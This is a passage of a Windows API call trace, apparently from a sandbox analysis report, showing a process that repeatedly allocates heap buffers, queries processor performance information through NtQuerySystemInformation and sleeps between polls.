SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.256] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.257] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.257] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.257] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.257] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.258] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.262] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.265] Sleep (dwMilliseconds=0x110) [0198.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.286] Sleep (dwMilliseconds=0x110) [0198.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.302] Sleep (dwMilliseconds=0x110) [0198.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.348] Sleep (dwMilliseconds=0x110) [0198.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.382] Sleep (dwMilliseconds=0x110) [0198.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.394] Sleep (dwMilliseconds=0x110) [0198.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.408] Sleep (dwMilliseconds=0x110) [0198.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.439] Sleep (dwMilliseconds=0x110) [0198.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.461] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.463] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.463] Sleep (dwMilliseconds=0x110) [0198.480] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.480] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.481] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.494] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.494] Sleep (dwMilliseconds=0x110) [0198.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.522] Sleep (dwMilliseconds=0x110) [0198.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.537] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.538] Sleep (dwMilliseconds=0x110) [0198.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.544] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.547] Sleep (dwMilliseconds=0x110) [0198.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 